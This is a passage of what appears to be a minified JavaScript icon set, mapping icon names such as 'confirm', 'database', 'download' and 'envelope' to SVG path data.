0l-.01-.02-3.99-8.98c-.06-.12-.09-.26-.09-.4s.03-.28.09-.4L9.08.62 9.09.6a.991.991 0 0 1 1.82 0l.01.02 3.99 8.98c.06.12.09.26.09.4zm-5-6.54L7.09 10h5.81L10 3.46z"],compressed:["M19.89 6.56l-2.99-6h-.01C16.72.23 16.39 0 16 0H4c-.39 0-.72.23-.89.56H3.1l-3 6h.01C.05 6.69 0 6.84 0 7v12c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V7c0-.16-.05-.31-.11-.44zM11 2h4.38l2 4H11V2zM4.62 2H9v4H2.62l2-4zM18 18H2V8h7v4.59L6.71 10.3A.965.965 0 0 0 6 10a1.003 1.003 0 0 0-.71 1.71l4 4c.18.18.43.29.71.29s.53-.11.71-.29l4-4a1.003 1.003 0 0 0-1.42-1.42L11 12.59V8h7v10z"],confirm:["M9.71 5.29a1.003 1.003 0 0 0-1.42 1.42l3 3c.18.18.43.29.71.29s.53-.11.71-.29l7-7a1.003 1.003 0 0 0-1.42-1.42L12 7.59l-2.29-2.3zm7.93 2.32c.23.75.36 1.56.36 2.39 0 4.42-3.58 8-8 8s-8-3.58-8-8a7.998 7.998 0 0 1 11.8-7.04l1.46-1.46C13.73.56 11.93 0 10 0 4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10c0-1.4-.29-2.73-.81-3.95l-1.55 1.56z"],console:["M19 19H1c-.55 0-1-.45-1-1V2c0-.55.45-1 1-1h18c.55 0 1 .45 1 1v16c0 .55-.45 1-1 1zM18 6H2v11h16V6zM4 8c.28 0 .53.11.71.29l2 2c.18.18.29.43.29.71s-.11.53-.29.71l-2 2a1.003 1.003 0 0 1-1.42-1.42L4.59 11l-1.3-1.29A1.003 1.003 0 0 1 4 8zm5 4h3c.55 0 1 .45 1 1s-.45 1-1 1H9c-.55 0-1-.45-1-1s.45-1 1-1z"],contrast:["M19 8h-1.26c-.19-.73-.48-1.42-.85-2.06l.94-.94a.996.996 0 0 0 0-1.41l-1.41-1.41a.996.996 0 0 0-1.41 0l-.94.94c-.65-.38-1.34-.67-2.07-.86V1c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v1.26c-.76.2-1.47.5-2.13.89L5 2.28a.972.972 0 0 0-1.36 0L2.28 3.64c-.37.38-.37.98 0 1.36l.87.87c-.39.66-.69 1.37-.89 2.13H1c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h1.26c.19.73.48 1.42.85 2.06l-.94.94a.996.996 0 0 0 0 1.41l1.41 1.41c.39.39 1.02.39 1.41 0l.94-.94c.64.38 1.33.66 2.06.85V19c0 .55.45 1 1 1h2c.55 0 1-.45 1-1v-1.26c.76-.2 1.47-.5 2.13-.89l.88.87c.37.37.98.37 1.36 0l1.36-1.36c.37-.38.37-.98 0-1.36l-.87-.87c.4-.65.7-1.37.89-2.13H19c.55 0 1-.45 1-1V9c0-.55-.45-1-1-1zm-9 7c-2.76 0-5-2.24-5-5s2.24-5 5-5v10z"],control:["M17 10h-7v7h7v-7zm0-7h-7v6h7V3zM9 3H3v14h6V3zm10-3H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18H2V2h16v16z"],"credit-card":["M19 3H1c-.55 0-1 .45-1 1v2h20V4c0-.55-.45-1-1-1zM0 16c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V8H0v8zm6.5-2h7c.28 0 .5.22.5.5s-.22.5-.5.5h-7c-.28 0-.5-.22-.5-.5s.22-.5.5-.5zm-4 0h2c.28 0 .5.22.5.5s-.22.5-.5.5h-2c-.28 0-.5-.22-.5-.5s.22-.5.5-.5z"],cross:["M11.41 10l4.29-4.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L10 8.59l-4.29-4.3a1.003 1.003 0 0 0-1.42 1.42L8.59 10 4.3 14.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l4.29-4.3 4.29 4.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L11.41 10z"],crown:["M2 8l4 2 4-5 4 5 4-2-1 7H3L2 8zm8-6a1 1 0 1 1 0 2 1 1 0 0 1 0-2zM1 5a1 1 0 1 1 0 2 1 1 0 0 1 0-2zm18 0a1 1 0 1 1 0 2 1 1 0 0 1 0-2zM3 16h14v2H3v-2z"],cube:["M1.953 4.481l7.41-4.02c.394-.215.88-.215 1.275 0l7.409 4.02L10 9.22 1.953 4.48zm-.817.68L9.5 10.085v9.281a1.316 1.316 0 0 1-.138-.064l-7.714-4.186A1.211 1.211 0 0 1 1 14.057v-8.35c0-.193.048-.38.136-.547zm17.728 0c.088.166.136.353.136.546v8.35c0 .438-.247.842-.648 1.06l-7.714 4.186c-.045.024-.091.046-.138.064v-9.281l8.364-4.926z"],"cube-add":["M17 3h2a1 1 0 0 1 0 2h-2v2a1 1 0 0 1-2 0V5h-2a1 1 0 0 1 0-2h2V1a1 1 0 0 1 2 0v2zm-3.969 4.435L10 9.22 1.953 4.48l7.41-4.02c.394-.215.88-.215 1.275 0l1.33.721A3.001 3.001 0 0 0 13 7c0 .148.01.293.031.435zm.319.972A3 3 0 0 0 19 7v7.057c0 .438-.247.842-.648 1.06l-7.714 4.186c-.045.024-.091.046-.138.064v-9.281l2.85-1.679zM1.136 5.16L9.5 10.086v9.281a1.316 1.316 0 0 1-.138-.064l-7.714-4.186A1.211 1.211 0 0 1 1 14.057v-8.35c0-.193.048-.38.136-.547z"],"cube-remove":["M11.968 1.182A3.001 3.001 0 0 0 13 7h.77L10 9.22 1.953 4.48l7.41-4.02c.394-.215.88-.215 1.275 0l1.33.721zM19 7v7.057c0 .438-.247.842-.648 1.06l-7.714 4.186c-.045.024-.091.046-.138.064v-9.281L15.74 7H19zM1.136 5.16L9.5 10.086v9.281a1.316 1.316 0 0 1-.138-.064l-7.714-4.186A1.211 1.211 0 0 1 1 14.057v-8.35c0-.193.048-.38.136-.547zM13 3h6a1 1 0 0 1 0 2h-6a1 1 0 0 1 0-2z"],"curved-range-chart":["M19 16H3.02l2.14-1.74c2.25 1.7 7.33.46 11.83-2.99l-1.29-1.5c-3.56 2.74-7.31 4.03-8.93 3.19l10.55-8.57-.63-.78-10.59 8.6c-.64-1.64 1.46-4.91 5.09-7.7L9.9 3.01c-4.6 3.54-6.91 8.12-5.41 10.51L2 15.54V3c0-.55-.45-1-1-1s-1 .45-1 1v14a.998.998 0 0 0 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],cut:["M16 2s.72-1.28 0-2l-5.29 6.25 1.28 1.54L16 2zm.08 10c-.55 0-1.07.12-1.54.32L4.31 0c-.7.72 0 2 0 2l4.45 6.56-3.19 3.77C5.09 12.12 4.56 12 4 12c-2.21 0-4 1.79-4 4s1.79 4 4 4 4-1.79 4-4c0-.65-.17-1.26-.45-1.8l2.54-3.67 2.49 3.67c-.27.54-.44 1.15-.44 1.8 0 2.21 1.76 4 3.92 4 2.17 0 3.92-1.79 3.92-4 .02-2.21-1.74-4-3.9-4zM4 18c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2zm12.08 0c-1.08 0-1.96-.9-1.96-2s.88-2 1.96-2 1.96.9 1.96 2-.88 2-1.96 2z"],dashboard:["M6 5c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zM4 9c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm6-4c.55 0 1-.45 1-1s-.45-1-1-1-1 .45-1 1 .45 1 1 1zm0-5C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8zm6-9c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1zm-8 5c0 1.1.9 2 2 2s2-.9 2-2c0-.33-2-8-2-8s-2 7.67-2 8zm6-9c-.55 0-1 .45-1 1s.45 1 1 1 1-.45 1-1-.45-1-1-1z"],database:["M2.01 5.1v5.4c0 1.38 3.58 2.5 8 2.5s8-1.12 8-2.5V5.1c-1.49 1.13-4.51 1.9-8 1.9-3.48 0-6.5-.77-8-1.9zm8 .9c4.42 0 8-1.12 8-2.5s-3.58-2.5-8-2.5-8 1.12-8 2.5S5.6 6 10.01 6zm-8 6.1v5.4c0 1.38 3.58 2.5 8 2.5s8-1.12 8-2.5v-5.4c-1.49 1.13-4.51 1.9-8 1.9-3.48 0-6.5-.77-8-1.9z"],delete:["M15 6a1.003 1.003 0 0 0-1.71-.71L10 8.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42L8.59 10 5.3 13.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3.29-3.3 3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L11.41 10l3.29-3.29c.19-.18.3-.43.3-.71zm-5-6C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"],delta:["M10 0L0 20h20L10 0zM9 6l6 12H3L9 6z"],"derive-column":["M7.1 8.2h-.99c.28-1.11.66-1.92 1.12-2.43.28-.32.56-.48.83-.48.05 0 .1.02.13.05.03.03.05.07.05.12 0 .04-.04.13-.11.25a.64.64 0 0 0-.12.35c0 .15.06.28.18.39.12.11.27.16.45.16.2 0 .36-.07.49-.2s.2-.31.2-.54c0-.26-.1-.47-.3-.63-.19-.16-.51-.24-.95-.24-.68 0-1.3.19-1.85.58-.56.38-1.09 1.02-1.59 1.91-.17.3-.34.5-.49.59-.15.08-.4.13-.74.12l-.23.77h.95l-1.39 5.24c-.23.86-.39 1.39-.47 1.59-.12.29-.3.54-.54.75-.1.08-.21.12-.35.12-.04 0-.07-.01-.1-.03l-.03-.04c0-.02.03-.07.1-.13.07-.07.1-.17.1-.31 0-.15-.05-.28-.16-.38-.11-.1-.27-.15-.47-.15-.25 0-.44.07-.59.2-.15.12-.23.28-.23.46 0 .19.09.36.27.5.19.14.47.21.86.21.61 0 1.16-.15 1.63-.46.48-.31.89-.78 1.25-1.43.35-.64.72-1.68 1.09-3.11l.8-3.03h.96l.24-.77zM19 0h-9c-.55 0-1 .45-1 1v3h2V2h7v16h-7v-2H9v3c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-8.79 13.49c.15.28.32.49.52.61.19.12.44.19.73.19.28 0 .57-.1.86-.3.38-.25.77-.69 1.17-1.31l-.25-.14c-.27.37-.48.6-.61.69-.09.06-.19.09-.31.09-.14 0-.28-.09-.42-.26-.23-.29-.54-1.09-.93-2.4.35-.59.64-.97.87-1.15.17-.13.35-.2.55-.2.07 0 .2.03.39.08s.36.08.5.08c.2 0 .37-.07.5-.2.15-.14.22-.31.22-.52 0-.22-.07-.4-.2-.53s-.33-.2-.58-.2c-.22 0-.43.05-.63.15-.2.1-.45.32-.75.67-.23.25-.56.7-1.01 1.33a6.52 6.52 0 0 0-.91-2.15l-2.39.39-.05.25c.18-.03.33-.05.45-.05.24 0 .43.1.59.3.25.31.59 1.24 1.02 2.8-.34.44-.58.73-.7.87-.21.22-.38.36-.52.43-.1.05-.22.08-.35.08-.1 0-.26-.05-.49-.16a1.01 1.01 0 0 0-.42-.11c-.23 0-.42.07-.57.22-.15.14-.23.33-.23.55 0 .21.07.38.21.51.14.13.33.2.56.2.23 0 .44-.05.64-.14.2-.09.45-.29.75-.59s.72-.78 1.25-1.43c.21.61.39 1.06.54 1.35z"],desktop:["M19 0H1C.45 0 0 .45 0 1v13c0 .55.45 1 1 1h5.67l-.5 3H5c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1h-1.17l-.5-3H19c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 13H2V2h16v11z"],"diagram-tree":["M19 10v5h-2v-4h-6v4H9v-4H3v4H1v-5a1 1 0 0 1 1-1h7V5h2v4h7a1 1 0 0 1 1 1zM1 16h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H1a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zm16 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zm-8 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H9a1 1 0 0 1-1-1v-2a1 1 0 0 1 1-1zM9 0h2a1 1 0 0 1 1 1v2a1 1 0 0 1-1 1H9a1 1 0 0 1-1-1V1a1 1 0 0 1 1-1z"],"direction-left":["M20 3.02l-20 7 20 7-5-7z"],"direction-right":["M20 10.02l-20-7 5 7-5 7z"],disable:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zM2 10c0-4.42 3.58-8 8-8 1.85 0 3.55.63 4.9 1.69L3.69 14.9A7.902 7.902 0 0 1 2 10zm8 8c-1.85 0-3.55-.63-4.9-1.69L16.31 5.1A7.902 7.902 0 0 1 18 10c0 4.42-3.58 8-8 8z"],document:["M11.98 0h-8c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V6l-6-6zm4 18h-11V2h6v5h5v11z"],"document-open":["M8 15c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1s.45 1 1 1h2.59L1.3 16.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L8 12.41V15zm5-15H5c-.55 0-1 .45-1 1v6h2V2h6v5h5v11H6v-.76L4.04 19.2c.1.45.48.8.96.8h13c.55 0 1-.45 1-1V6l-6-6z"],"document-share":["M14.09 10.09c-.31.31-.67.57-1.09.72V18H2V2h6v5h1.18c.15-.42.39-.8.7-1.11v-.01l2.45-2.45c-.42-.29-.78-.65-1.01-1.11L9 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V9.24l-.88.88-.03-.03zM19 0h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L11.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 3.41V6c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1z"],dollar:["M15.57 11.19c-.27-.51-.63-.93-1.07-1.26-.44-.33-.95-.6-1.51-.79-.56-.2-1.14-.36-1.72-.5-.6-.14-1.19-.26-1.75-.38-.57-.13-1.07-.27-1.51-.44-.44-.17-.8-.38-1.07-.63s-.41-.59-.41-1c0-.33.09-.6.28-.81.19-.21.42-.36.69-.47.27-.11.57-.18.88-.22.31-.04.58-.06.8-.06.71 0 1.35.14 1.9.41.55.27.91.81 1.06 1.62h3.36c-.09-.84-.32-1.56-.69-2.16-.37-.6-.83-1.08-1.38-1.45-.56-.37-1.18-.64-1.86-.81-.19-.05-.38-.07-.57-.1V1c0-.55-.45-1-1-1H9c-.55 0-1 .45-1 1v1.1c-.22.03-.43.05-.66.1-.73.13-1.39.37-1.98.71-.6.34-1.09.8-1.47 1.35-.39.56-.58 1.25-.58 2.08 0 .76.13 1.41.4 1.93.26.52.62.95 1.06 1.28.44.33.94.6 1.5.79.55.2 1.13.36 1.74.5.58.14 1.16.26 1.72.38s1.07.26 1.51.43c.44.17.8.39 1.09.66.28.27.43.63.45 1.06.02.43-.08.78-.3 1.04-.22.26-.49.47-.83.6-.34.14-.7.23-1.09.28-.39.05-.73.07-1.03.07-.87 0-1.61-.2-2.23-.59-.62-.39-.98-1.08-1.07-2.06H3c.02.9.19 1.68.52 2.34.33.66.78 1.21 1.35 1.65.57.44 1.25.77 2.03.98.35.1.71.16 1.08.21V19c0 .55.45 1 1 1h1c.55 0 1-.45 1-1v-1.13c.25-.04.5-.07.76-.13.77-.18 1.47-.46 2.1-.85.63-.39 1.14-.9 1.54-1.53.4-.63.59-1.39.59-2.29.01-.75-.13-1.37-.4-1.88z"],dot:["M10 6a4 4 0 1 0 0 8 4 4 0 1 0 0-8z"],"double-caret-horizontal":["M8 4c-.24 0-.46.1-.63.24l-.01-.01-6 5 .01.01c-.22.19-.37.45-.37.76s.15.57.37.76l-.01.01 6 5 .01-.01c.17.14.39.24.63.24.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm11 6c0-.31-.15-.57-.37-.76l.01-.01-6-5-.01.01C12.46 4.1 12.24 4 12 4c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1 .24 0 .46-.1.63-.24l.01.01 6-5-.01-.01c.22-.19.37-.45.37-.76z"],"double-caret-vertical":["M5 9h10c.55 0 1-.45 1-1 0-.24-.1-.46-.24-.63l.01-.01-5-6-.01.01C10.57 1.15 10.31 1 10 1s-.57.15-.76.37l-.01-.01-5 6 .01.01C4.1 7.54 4 7.76 4 8c0 .55.45 1 1 1zm10 2H5c-.55 0-1 .45-1 1 0 .24.1.46.24.63l-.01.01 5 6 .01-.01c.19.22.45.37.76.37s.57-.15.76-.37l.01.01 5-6-.01-.01c.14-.17.24-.39.24-.63 0-.55-.45-1-1-1z"],"double-chevron-down":["M9.29 10.71c.18.18.43.29.71.29s.53-.11.71-.29l6-6a1.003 1.003 0 0 0-1.42-1.42L10 8.59l-5.29-5.3a1.003 1.003 0 0 0-1.42 1.42l6 6zM16 9c-.28 0-.53.11-.71.29L10 14.59l-5.29-5.3a1.003 1.003 0 0 0-1.42 1.42l6 6c.18.18.43.29.71.29s.53-.11.71-.29l6-6A1.003 1.003 0 0 0 16 9z"],"double-chevron-left":["M5.41 10l5.29-5.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-6 6c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l6 6a1.003 1.003 0 0 0 1.42-1.42L5.41 10zm6 0l5.29-5.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-6 6c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l6 6a1.003 1.003 0 0 0 1.42-1.42L11.41 10z"],"double-chevron-right":["M11 10c0-.28-.11-.53-.29-.71l-6-6a1.003 1.003 0 0 0-1.42 1.42L8.59 10 3.3 15.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l6-6c.18-.18.29-.43.29-.71zm5.71-.71l-6-6a1.003 1.003 0 0 0-1.42 1.42l5.3 5.29-5.29 5.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l6-6c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"double-chevron-up":["M4 11c.28 0 .53-.11.71-.29L10 5.41l5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-6-6A.997.997 0 0 0 10 3c-.28 0-.53.11-.71.29l-6 6A1.003 1.003 0 0 0 4 11zm6.71-1.71A.997.997 0 0 0 10 9c-.28 0-.53.11-.71.29l-6 6a1.003 1.003 0 0 0 1.42 1.42l5.29-5.3 5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-6-6z"],"doughnut-chart":["M16 10c0 3.31-2.69 6-6 6s-6-2.69-6-6 2.69-6 6-6V0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10h-4zm-.09-1h4.04C19.48 4.28 15.72.52 11 .05V4.1A5.98 5.98 0 0 1 15.91 9z"],download:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm4.71 11.71l-4 4c-.18.18-.43.29-.71.29s-.53-.11-.71-.29l-4-4a1.003 1.003 0 0 1 1.42-1.42L9 12.59V5c0-.55.45-1 1-1s1 .45 1 1v7.59l2.29-2.29c.18-.19.43-.3.71-.3a1.003 1.003 0 0 1 .71 1.71z"],"drag-handle-horizontal":["M7.5 11c-.83 0-1.5.67-1.5 1.5S6.67 14 7.5 14 9 13.33 9 12.5 8.33 11 7.5 11zm-5-5C1.67 6 1 6.67 1 7.5S1.67 9 2.5 9 4 8.33 4 7.5 3.33 6 2.5 6zm0 5c-.83 0-1.5.67-1.5 1.5S1.67 14 2.5 14 4 13.33 4 12.5 3.33 11 2.5 11zm15-2c.83 0 1.5-.67 1.5-1.5S18.33 6 17.5 6 16 6.67 16 7.5 16.67 9 17.5 9zm-5 2c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5zm5 0c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5zm-10-5C6.67 6 6 6.67 6 7.5S6.67 9 7.5 9 9 8.33 9 7.5 8.33 6 7.5 6zm5 0c-.83 0-1.5.67-1.5 1.5S11.67 9 12.5 9 14 8.33 14 7.5 13.33 6 12.5 6z"],"drag-handle-vertical":["M7.5 6C6.67 6 6 6.67 6 7.5S6.67 9 7.5 9 9 8.33 9 7.5 8.33 6 7.5 6zm0 5c-.83 0-1.5.67-1.5 1.5S6.67 14 7.5 14 9 13.33 9 12.5 8.33 11 7.5 11zm0 5c-.83 0-1.5.67-1.5 1.5S6.67 19 7.5 19 9 18.33 9 17.5 8.33 16 7.5 16zm5-12c.83 0 1.5-.67 1.5-1.5S13.33 1 12.5 1 11 1.67 11 2.5 11.67 4 12.5 4zm-5-3C6.67 1 6 1.67 6 2.5S6.67 4 7.5 4 9 3.33 9 2.5 8.33 1 7.5 1zm5 10c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5zm0 5c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5zm0-10c-.83 0-1.5.67-1.5 1.5S11.67 9 12.5 9 14 8.33 14 7.5 13.33 6 12.5 6z"],draw:["M17.7 12.7c0-.1 0-.2-.1-.3l-2-7c-.1-.3-.3-.6-.6-.7L1.8 0l-.6.5L7.7 7c.3-.2.6-.3 1-.3 1.1 0 2 .9 2 2s-.9 2-2 2-2-.9-2-2c0-.4.1-.7.3-1L.5 1.2l-.5.6L4.7 15c.1.3.4.5.7.6l7 2c.1 0 .2.1.3.1.3 0 .5-.1.7-.3l4-4c.2-.2.3-.5.3-.7zm1 1c-.3 0-.5.1-.7.3l-4 4c-.2.2-.3.4-.3.7 0 .5.4 1 1 1 .3 0 .5-.1.7-.3l4-4c.2-.2.3-.4.3-.7 0-.6-.5-1-1-1z"],"drive-time":["M20.01 7.7c0-.63-.5-1.14-1.1-1.14h-1.32l-.95-2.57c-.24-.64-.95-1.31-1.59-1.5 0 0-1.65-.49-5.05-.49s-5.04.49-5.04.49c-.63.19-1.35.86-1.59 1.5l-.95 2.57H1.1C.5 6.56 0 7.07 0 7.7c0 .63.5 1.14 1.1 1.14h.47l-.34.91c-.24.64-.43 1.72-.43 2.4v5.39c0 .8.63 1.45 1.4 1.45.77 0 1.4-.65 1.4-1.45v-.83h12.8v.83c0 .8.63 1.45 1.4 1.45s1.4-.65 1.4-1.45v-5.39c0-.68-.19-1.77-.43-2.4l-.34-.91h.47c.61 0 1.11-.51 1.11-1.14zm-16.47.34l1.12-3.16c.08-.22.32-.39.54-.39h9.6c.22 0 .46.17.54.39l1.12 3.16c.08.21-.04.39-.26.39H3.8c-.22-.01-.34-.18-.26-.39zm.96 4.94c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.68 1.5 1.5c0 .83-.67 1.5-1.5 1.5zm11 0c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"],duplicate:["M15 4H1c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V5c0-.55-.45-1-1-1zm-1 14H2V6h12v12zm5-18H5c-.55 0-1 .45-1 1v2h2V2h12v12h-1v2h2c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],edit:["M4.59 12.59l2.83 2.83 7.65-7.65-2.83-2.83-7.65 7.65zM2 18l4.41-1.59-2.81-2.79L2 18zM16 2c-.55 0-1.05.22-1.41.59l-1.65 1.65 2.83 2.83 1.65-1.65A2.006 2.006 0 0 0 16 2z"],eject:["M4 12h12c.55 0 1-.45 1-1 0-.25-.1-.47-.25-.64l.01-.01-6-7-.01.01C10.57 3.14 10.3 3 10 3s-.57.14-.75.36l-.01-.01-6 7 .01.01c-.15.17-.25.39-.25.64 0 .55.45 1 1 1zm12 1H4c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1z"],endorsed:["M19.83 9.38L18.81 7.6V5.62c0-.45-.23-.85-.61-1.08l-1.71-1-1.02-1.76a1.25 1.25 0 0 0-1.08-.61h-2.03l-1.74-1c-.38-.23-.87-.23-1.25 0l-1.74 1H5.65c-.44 0-.85.23-1.08.61L3.58 3.5l-1.8 1.04c-.38.24-.62.64-.62 1.08v2.06L.17 9.4c-.11.19-.17.4-.17.61s.06.42.17.61l.99 1.72v2.06c0 .45.23.85.61 1.08l1.78 1.02.99 1.72c.23.38.63.61 1.08.61h1.99l1.74 1c.19.11.41.17.62.17.21 0 .42-.06.61-.17l1.74-1h2.03c.44 0 .85-.23 1.08-.61l1.02-1.76 1.71-1c.38-.23.61-.64.61-1.08v-1.97l1.02-1.78c.27-.38.27-.85.04-1.25zm-5.08-.71l-5.01 5.01c-.18.18-.43.29-.71.29-.28 0-.53-.11-.71-.29l-3.01-3.01a1.003 1.003 0 0 1 1.42-1.42l2.3 2.3 4.31-4.3a1.003 1.003 0 0 1 1.71.71c0 .28-.12.53-.3.71z"],envelope:["M0 4.01v11.91l6.27-6.27L0 4.01zm18.91-1.03H1.09L10 10.97l8.91-7.99zm-5.18 6.66L20 15.92V4.01l-6.27 5.63zm-3.23 2.9c-.13.12-.31.19-.5.19s-.37-.07-.5-.19l-2.11-1.89-6.33 6.33h17.88l-6.33-6.33-2.11 1.89z"],eraser:["M18.71 8.43c.39-.4.39-1.05 0-1.45l-5.53-5.72a.967.967 0 0 0-1.4 0L1.29 12.1c-.39.4-.39 1.05 0 1.45l4.25 4.39 2.13 2.05h9.27c.02 0 .03.01.05.01.55 0 1-.45 1-1s-.45-1-1-1H9.46l.05-.05h.01l.81-.84 8.38-8.68zM7.52 17.94l-4.95-5.12 4.46-4.61 4.95 5.12-4.46 4.61z"],error:["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zm1 16H9v-2h2v2zm0-3H9V4h2v9z"],euro:["M8.89 4.47c.56-.31 1.23-.47 2.03-.47.44 0 .85.07 1.25.22.4.14.76.35 1.07.6.17.14.33.3.47.47l2.32-2.32c-.16-.15-.3-.32-.47-.46-.62-.49-1.33-.87-2.12-1.13-.8-.25-1.64-.38-2.52-.38-1.24 0-2.35.22-3.33.66-.99.44-1.82 1.05-2.49 1.82-.68.78-1.2 1.68-1.56 2.72-.09.26-.13.54-.2.8H2c-.55 0-1 .45-1 1s.45 1 1 1h1.04c-.01.2-.04.38-.04.58 0 .15.03.28.03.42H2c-.55 0-1 .45-1 1s.45 1 1 1h1.31c.07.3.13.6.23.89.36 1.02.88 1.92 1.56 2.67.68.76 1.51 1.35 2.49 1.79.98.43 2.09.65 3.33.65.99 0 1.9-.15 2.73-.46.83-.3 1.55-.74 2.17-1.32.03-.03.05-.06.08-.09l-2.41-2.15c-.01.01-.02.02-.02.03-.61.67-1.46 1-2.54 1-.8 0-1.47-.16-2.03-.47-.56-.31-1.01-.72-1.35-1.24-.28-.38-.47-.83-.63-1.3H12c.55 0 1-.45 1-1s-.45-1-1-1H6.56c0-.14-.02-.28-.02-.42 0-.2.02-.39.03-.58H13c.55 0 1-.45 1-1s-.45-1-1-1H6.94c.15-.46.34-.9.59-1.28.35-.52.8-.94 1.36-1.25zM18 11.38v0z"],exchange:["M2.5 8a2.5 2.5 0 0 0 0 5 2.5 2.5 0 0 0 0-5zm10.35 3.15a.495.495 0 1 0-.7.7L13.3 13H5.5c-.28 0-.5.22-.5.5s.22.5.5.5h7.79l-1.15 1.15c-.08.09-.14.21-.14.35a.495.495 0 0 0 .85.35l2-2c.09-.09.15-.21.15-.35s-.06-.26-.15-.35l-2-2zM17.5 8a2.5 2.5 0 0 0 0 5 2.5 2.5 0 0 0 0-5zM7.15 9.85a.495.495 0 1 0 .7-.7L6.71 8h7.79c.28 0 .5-.22.5-.5s-.22-.5-.5-.5H6.71l1.15-1.15c.08-.09.14-.21.14-.35a.495.495 0 0 0-.85-.35l-2 2c-.09.09-.15.21-.15.35s.06.26.15.35l2 2z"],"exclude-row":["M1 3h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zM0 13a1.003 1.003 0 0 0 1.71.71L4 11.41l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L5.41 10 7.7 7.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L4 8.59l-2.29-2.3A1.003 1.003 0 0 0 .29 7.71L2.59 10 .3 12.29c-.19.18-.3.43-.3.71zm18-5h-7c-1.1 0-2 .9-2 2s.9 2 2 2h7c1.1 0 2-.9 2-2s-.9-2-2-2zm1 9H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],"expand-all":["M4 9c.28 0 .53-.11.71-.29L10 3.41l5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-6-6C10.53 1.11 10.28 1 10 1s-.53.11-.71.29l-6 6A1.003 